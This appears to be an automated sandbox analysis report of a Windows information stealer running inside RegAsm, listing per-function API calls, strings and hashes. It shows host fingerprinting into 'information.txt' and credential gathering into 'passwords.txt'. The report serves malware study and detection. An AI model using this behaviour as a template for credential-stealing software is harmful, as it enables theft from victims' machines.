API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
String ID: "$"$"$*$------$------$------$------$build_id$mode
API String ID: 530647464-3630346487
Opcode ID: 295d76698cad3f0070742d993786b5cfb92bdf050978c5db47067aa722c3827c
Instruction ID: 80b1796918ec1c29b6be473428c1b8ad95fa748133d466919d2d563d3e35a917
Opcode Fuzzy Hash: 295d76698cad3f0070742d993786b5cfb92bdf050978c5db47067aa722c3827c
Instruction Fuzzy Hash: 1A526271801249EADB15E7E5C952BEEBBB89F19304F2440AEF50173182DE786B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 004158F0 Relevance: 50.0, APIs: 2, Strings: 26, Instructions: 1038
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410300: GetProcessHeap.KERNEL32(00000000,00000104,?,004283B0,00000000,?,00000000,00000000), ref: 0041030E
Part of subcall function 00410300: HeapAlloc.KERNEL32(00000000,?,004283B0,00000000,?,00000000,00000000), ref: 00410315
Part of subcall function 00410300: GetLocalTime.KERNEL32(004283B0,?,004283B0,00000000,?,00000000,00000000), ref: 00410321
Part of subcall function 00410300: wsprintfA.USER32 ref: 0041034D

Part of subcall function 00410C90: memset.MSVCRT ref: 00410CB5
Part of subcall function 00410C90: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410CD2
Part of subcall function 00410C90: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410CF4
Part of subcall function 00410C90: CharToOemA.USER32(00000000,?), ref: 00410D12

Part of subcall function 00410D30: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

Part of subcall function 00410D90: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
Part of subcall function 00410D90: GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410E54

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004283E8,00000000,?,00000000,00000000,00000000,00000000), ref: 00415C2B

Part of subcall function 00411A40: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411A5C
Part of subcall function 00411A40: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411A77
Part of subcall function 00411A40: CloseHandle.KERNEL32(00000000), ref: 00411A7E

Part of subcall function 00410F40: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410F55
Part of subcall function 00410F40: HeapAlloc.KERNEL32(00000000), ref: 00410F5C

Part of subcall function 004110A0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4,00000000), ref: 004110C3
Part of subcall function 004110A0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C), ref: 004110D4
Part of subcall function 004110A0: CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000), ref: 004110EE
Part of subcall function 004110A0: CoSetProxyBlanket.OLE32(004283F4,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000), ref: 00411127
Part of subcall function 004110A0: VariantInit.OLEAUT32(?), ref: 00411186

Part of subcall function 00411260: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 00411283
Part of subcall function 00411260: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430), ref: 00411294
Part of subcall function 00411260: CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 004112AE
Part of subcall function 00411260: CoSetProxyBlanket.OLE32(00428430,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000), ref: 004112E7
Part of subcall function 00411260: VariantInit.OLEAUT32(?), ref: 00411342

Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,012B2F20,0041887F), ref: 004102CC
Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,012B2F20,0041887F), ref: 004102D3
Part of subcall function 004102C0: GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,012B2DE0,?,00401074,012B2DE0,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,012B2DE0,?,00401074,012B2DE0,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,012B2DE0), ref: 004102A7

Part of subcall function 00410C10: CreateDCA.GDI32(012B2F30,00000000,00000000,00000000), ref: 00410C2A
Part of subcall function 00410C10: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410C35
Part of subcall function 00410C10: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410C40
Part of subcall function 00410C10: ReleaseDC.USER32(00000000,00000000), ref: 00410C4B
Part of subcall function 00410C10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000), ref: 00410C58
Part of subcall function 00410C10: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000,?), ref: 00410C5F
Part of subcall function 00410C10: wsprintfA.USER32 ref: 00410C6F

Part of subcall function 004103D0: GetKeyboardLayoutList.USER32(00000000,00000000,004280A7,?,?,00000001), ref: 00410417
Part of subcall function 004103D0: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410429
Part of subcall function 004103D0: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410434
Part of subcall function 004103D0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
Part of subcall function 004103D0: LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Part of subcall function 00410360: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410371
Part of subcall function 00410360: HeapAlloc.KERNEL32(00000000), ref: 00410378
Part of subcall function 00410360: GetTimeZoneInformation.KERNEL32(?), ref: 00410387
Part of subcall function 00410360: wsprintfA.USER32 ref: 004103B2

Part of subcall function 00410530: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410545
Part of subcall function 00410530: HeapAlloc.KERNEL32(00000000), ref: 0041054C
Part of subcall function 00410530: RegOpenKeyExA.KERNEL32(80000002,012BB548,00000000,00020119,00000000), ref: 0041056B
Part of subcall function 00410530: RegQueryValueExA.KERNEL32(00000000,012C2B00,00000000,00000000,00000000,000000FF), ref: 00410586

Part of subcall function 004105E0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410602
Part of subcall function 004105E0: GetLastError.KERNEL32(?,?,00000001), ref: 00410610
Part of subcall function 004105E0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410648
Part of subcall function 004105E0: wsprintfA.USER32 ref: 00410692

Part of subcall function 004105A0: GetSystemInfo.KERNEL32(00000000), ref: 004105AD
Part of subcall function 004105A0: wsprintfA.USER32 ref: 004105C3

Part of subcall function 004106E0: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498), ref: 004106EE
Part of subcall function 004106E0: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498,00000000), ref: 004106F5
Part of subcall function 004106E0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410715
Part of subcall function 004106E0: wsprintfA.USER32 ref: 0041073B

Part of subcall function 00410750: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004107A7
Part of subcall function 00410750: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00410834

Part of subcall function 00410B00: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410B4F
Part of subcall function 00410B00: Process32First.KERNEL32(00000000,00000128), ref: 00410B5F
Part of subcall function 00410B00: Process32Next.KERNEL32(00000000,00000128), ref: 00410B71
Part of subcall function 00410B00: Process32Next.KERNEL32(00000000,00000128), ref: 00410BDE
Part of subcall function 00410B00: CloseHandle.KERNEL32(00000000), ref: 00410BE9

Part of subcall function 00410860: RegOpenKeyExA.KERNEL32(00000000,012B66D8,00000000,00020019,00000000,004280BF,?,00000001), ref: 004108BF

Part of subcall function 00410860: RegEnumKeyExA.KERNEL32(00000000,?,?,00428524,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041091E
Part of subcall function 00410860: wsprintfA.USER32 ref: 00410947
Part of subcall function 00410860: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410965
Part of subcall function 00410860: RegQueryValueExA.KERNEL32(?,012C2FF0,00000000,000F003F,?,00000400), ref: 00410995
Part of subcall function 00410860: lstrlen.KERNEL32(?), ref: 004109AA
Part of subcall function 00410860: RegQueryValueExA.KERNEL32(?,012C3020,00000000,000F003F,?,00000400,00000000,00421E41,?,00000000,?,004280F0), ref: 00410A2E

lstrlen.KERNEL32(00000000,00000000,?,00428534,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416697

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

HWID: , xrefs: 00415B6F
GUID: , xrefs: 00415ADC
VideoCard: , xrefs: 0041640D
Path: , xrefs: 00415C02
User Name: , xrefs: 00415F0C
TimeZone: , xrefs: 0041613C
Work Dir: In memory, xrefs: 00415C9C
Display Resolution: , xrefs: 00415F88
Threads: , xrefs: 00416309
W, xrefs: 00416718
AV: , xrefs: 00415DFD
RAM: , xrefs: 0041638B
Keyboard Languages: , xrefs: 0041601B
[Hardware], xrefs: 004161CA
Windows: , xrefs: 00415CEE
Version: , xrefs: 00415923
information.txt, xrefs: 004166B2
MachineID: , xrefs: 00415A60
Processor: , xrefs: 004161F9
Local Time: , xrefs: 004160BA
[Processes], xrefs: 004164E7
[Software], xrefs: 00416592
Date: , xrefs: 004159E4
Cores: , xrefs: 00416287
Install Date: , xrefs: 00415D6A
Computer Name: , xrefs: 00415E90

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 1864629043-4117839003
Opcode ID: e8240602e7ad9623efc1e5c09f4a11ac2f66258fc61510e5e7399bf9964c59ea
Instruction ID: 803c3528c2f6da264819a3d7c940b04ffa2433250a49f127d099ce38e6074702
Opcode Fuzzy Hash: e8240602e7ad9623efc1e5c09f4a11ac2f66258fc61510e5e7399bf9964c59ea
Instruction Fuzzy Hash: A8921E71805249E9CB15E7A1C952BEEBBB85F29304F6440BFB50273182DE7C6B4CCA79

Uniqueness

Uniqueness Score: -1.00%

Function 0040D090 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 335
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,012BF260,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040D149
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D1E2
RtlAllocateHeap.NTDLL(00000000), ref: 0040D1E9
lstrlen.KERNEL32(00000000,00000000), ref: 0040D296
lstrcat.KERNEL32(000000FF,012BF990), ref: 0040D2B0
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D2C3

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411AA0: memset.MSVCRT ref: 00411AD5
Part of subcall function 00411AA0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
Part of subcall function 00411AA0: HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
Part of subcall function 00411AA0: wsprintfW.USER32 ref: 00411B1C
Part of subcall function 00411AA0: OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
Part of subcall function 00411AA0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
Part of subcall function 00411AA0: CloseHandle.KERNEL32(00000000), ref: 00411B93

lstrcat.KERNEL32(000000FF,00427A6C), ref: 0040D2D2
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D2E5
lstrcat.KERNEL32(000000FF,00427A70), ref: 0040D2F4
lstrcat.KERNEL32(000000FF,012BF9A0), ref: 0040D305
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D318
lstrcat.KERNEL32(000000FF,00427A74), ref: 0040D327
lstrcat.KERNEL32(000000FF,012BF9D0), ref: 0040D338
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D34B
lstrcat.KERNEL32(000000FF,00427A78), ref: 0040D35A
lstrcat.KERNEL32(000000FF,012C2FC0), ref: 0040D36A
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D37D
lstrcat.KERNEL32(000000FF,00427A7C), ref: 0040D38C
lstrcat.KERNEL32(000000FF,00427A80), ref: 0040D39B
lstrlen.KERNEL32(000000FF), ref: 0040D3D3
memset.MSVCRT ref: 0040D428
DeleteFileA.KERNEL32(00000000), ref: 0040D458

Strings

passwords.txt, xrefs: 0040D3E6

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcess$lstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
String ID: passwords.txt
API String ID: 4049833551-347816968
Opcode ID: d387000265917b568817f1fcd2c2459dc7c0458e382306b92f0ffc660c2a8358
Instruction ID: 215b863f2430d563b93ca64cb16b4ae420a8412cb18fc12b55f4b5a4a6015adc
Opcode Fuzzy Hash: d387000265917b568817f1fcd2c2459dc7c0458e382306b92f0ffc660c2a8358
Instruction Fuzzy Hash: 55D17474900209ABCB04EBE4DC56BEEBB79AF19304F50452EF911B3291DF785A48CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00414650 Relevance: 39.6, APIs: 11, Strings: 11, Instructions: 1136
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414861
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004148F6

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00413D40: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042248F), ref: 00413DB5

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414A37
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414ACC
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414C19
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414CBB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DFC
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E91
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414FDE
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415073
Sleep.KERNEL32(0000EA60), ref: 00415082

Part of subcall function 00413EA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F37
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413F4E
Part of subcall function 00413EA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00413F7A
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413F8F
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413FAC

Strings

ERROR, xrefs: 004148E8
), xrefs: 0041561D
ERROR, xrefs: 00414853
ERROR, xrefs: 00414CAA
ERROR, xrefs: 00414FCD
ERROR, xrefs: 00414ABE
ERROR, xrefs: 00414A29
ERROR, xrefs: 00414E83
ERROR, xrefs: 00414DEE
ERROR, xrefs: 00415065
ERROR, xrefs: 00414C08

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: )$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-1563971337
Opcode ID: 19e96281626953c1a908ccdd9ae1c3c26a2b4c0d6237b4cad89262f2261f7a75
Instruction ID: 16c706f6c4dd8a9781f8db293bfe0d0ce14ffdf2baf3511eb8db9a0682d00a07
Opcode Fuzzy Hash: 19e96281626953c1a908ccdd9ae1c3c26a2b4c0d6237b4cad89262f2261f7a75
Instruction Fuzzy Hash: DFA26F70C01248EACB15EBB5C9567DDBBB85F19308F5440BEE90573282EF78574CCAAA

Uniqueness

Uniqueness Score: -1.00%

Function 004074E0 Relevance: 32.1, APIs: 21, Instructions: 578
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004100F0: StrCmpCA.SHLWAPI(?,00000000,?,00407516,012BF8F0,?,00000000,?), ref: 004100FA

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,012B2DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,012BF260,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 004075BF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040787E
lstrcat.KERNEL32(000000FF,00000000), ref: 004079D1
lstrcat.KERNEL32(000000FF,00427AAC), ref: 004079E0
lstrcat.KERNEL32(000000FF,00000000), ref: 004079F3
lstrcat.KERNEL32(000000FF,00427AB0), ref: 00407A02
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A15
lstrcat.KERNEL32(000000FF,00427AB4), ref: 00407A24
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A37
lstrcat.KERNEL32(000000FF,00427AB8), ref: 00407A46
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A59
lstrcat.KERNEL32(000000FF,00427ABC), ref: 00407A68
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A7B
lstrcat.KERNEL32(000000FF,00427AC0), ref: 00407A8A
lstrcat.KERNEL32(000000FF,00000000), ref: 00407AD1
lstrcat.KERNEL32(000000FF,00427AC4), ref: 00407AEE
lstrlen.KERNEL32(000000FF), ref: 00407B56
lstrlen.KERNEL32(000000FF), ref: 00407B65
RtlAllocateHeap.NTDLL(00000000), ref: 00407885

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411AA0: memset.MSVCRT ref: 00411AD5
Part of subcall function 00411AA0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
Part of subcall function 00411AA0: HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
Part of subcall function 00411AA0: wsprintfW.USER32 ref: 00411B1C
Part of subcall function 00411AA0: OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
Part of subcall function 00411AA0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
Part of subcall function 00411AA0: CloseHandle.KERNEL32(00000000), ref: 00411B93

memset.MSVCRT ref: 00407BBF
DeleteFileA.KERNEL32(00000000,?,?,?,00427A73), ref: 00407BE7

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
String ID:
API String ID: 2944411387-0
Opcode ID: d4dcf801c1ccb8dc7afc10bd14a435ef26f06da443b6dd9848c5a20a7ad679ae
Instruction ID: 3ca0864eb58e8f8aa976caedcdd73096d5702bd7c96c1b3cb961cac798526b89
Opcode Fuzzy Hash: d4dcf801c1ccb8dc7afc10bd14a435ef26f06da443b6dd9848c5a20a7ad679ae
Instruction Fuzzy Hash: 99327371804149EBCB14EBA5DC55BEEBB78AF19308F14416EF90273282DF786A48CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00412420 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 323stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00412466
lstrcpy.KERNEL32(?,00000000), ref: 004124F3
lstrcpy.KERNEL32(?,00000000), ref: 00412530
lstrcpy.KERNEL32(?,00000000), ref: 00412579
lstrcpy.KERNEL32(?,00000000), ref: 004125C2
lstrcpy.KERNEL32(?,00000000), ref: 0041260A
StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412795
strtok_s.MSVCRT ref: 00412822

Strings

false, xrefs: 004127AF
true, xrefs: 0041278F

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID: false$true
API String ID: 2610293679-2658103896
